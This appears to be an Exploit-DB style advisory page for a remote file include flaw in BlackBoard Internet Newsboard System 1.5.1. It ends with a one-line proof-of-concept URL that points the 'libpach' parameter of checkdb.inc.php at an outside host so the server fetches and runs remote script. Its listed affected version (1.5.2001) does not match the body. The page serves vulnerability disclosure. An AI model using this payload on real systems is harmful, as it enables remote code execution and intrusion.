header-logo
Suggest Exploit
vendor:
Internet Newsboard System
by:
Unknown
7.5
CVSS
HIGH
Remote File Include
Unknown
CWE
Product Name: Internet Newsboard System
Affected Version From: 1.5.2001
Affected Version To: 1.5.2001
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

BlackBoard Internet Newsboard System Remote File Include Vulnerability

The BlackBoard Internet Newsboard System is prone to a remote file include vulnerability. This vulnerability allows an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer. The issue arises due to the application's failure to properly sanitize user-supplied data.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11336/info

BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.

BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. It is possible that prior versions are affected as well.

http://www.example.com/bb_lib/checkdb.inc.php?libpach=http://www.example.com/